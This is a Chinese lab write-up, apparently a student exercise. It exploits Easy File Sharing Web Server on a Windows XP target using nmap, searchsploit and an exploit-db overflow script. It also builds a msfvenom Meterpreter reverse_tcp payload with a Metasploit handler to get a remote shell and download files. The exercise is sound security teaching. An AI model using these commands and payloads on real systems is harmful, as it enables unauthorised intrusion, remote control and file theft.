一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。
实验步骤:
1)在靶机中安装efssetup_20181(这里靶机用的是Winxp)。
将下载好的efssetup_20181.exe文件移动到靶机中,执行efssetup_20181.exe程序。
一直点next即可,最后finish完成安装。
点击try it。
这里可以看到端口号和ip地址。
2)扫描
在kali上打开终端,输入ifconfig查看自己的ip地址。
扫描该网段下的所有主机。
nmap 192.168.124.0/24
发现靶机的ip为192.168.124.138,不过这里我没有扫出靶机在80端口上执行着Easy File Sharing Web Server httpd服务。
不过不要紧,方法不止一种,当我们执行以下命令还是可以发现的。
命令:
nmap -sV -A -o easy-file.txt 192.168.124.138
3)漏洞利用
查找关于easy file sharing的漏洞。
命令:
searchsploit easy file sharing
左边为渗透模块名称,右边为其所在的位置 。
接下来我们利用溢出漏洞实现在靶机执行计算器程序,以/usr/share/exploitdb/exploits/windows/remote/39009.py为例。
命令:
python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.124.138 80
当我们回到靶机,会发现程序Easy File Sharing Web Server已经崩溃,并执行了计算器程序。
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
实验步骤:
1)生成被控端
命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.124.140 lport=5000 -f exe -o /存放payload.exe的路径/payload.exe
msfvenom:Metasploit程序内置的远程控制命令。
lhost=接收端的ip(你的kali的ip)。
-o:存放payload.exe的路径,也可以把payload.exe放在root文件夹里,即/root/payload.exe。
这里我选择的是放在桌面。
2)启动主控端
在终端输入msfconsole启动Metasploit,使用handler作为主控端。
3)在靶机中运行被控端程序
命令:按照顺序执行
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.124.140
这里ip地址是kali的。
set lport 5000
exploit
回车结果如下:
这时要去到靶机Winxp上运行payload.exe程序 ,返回kali发现在Metasploit中打开了一个session。
4)查看靶机系统上所有的文件
输入ls。
5)下载靶机上的文件
随便下载一个即可,这里选择efssetuo_20181.exe下载。
命令:
download efssetup_20181.exe
查看桌面,发现下载成功了。注:如果文件放在了root文件夹,需要打开文件系统(file system)找到root文件夹,然后右键以管理员权限打开即可。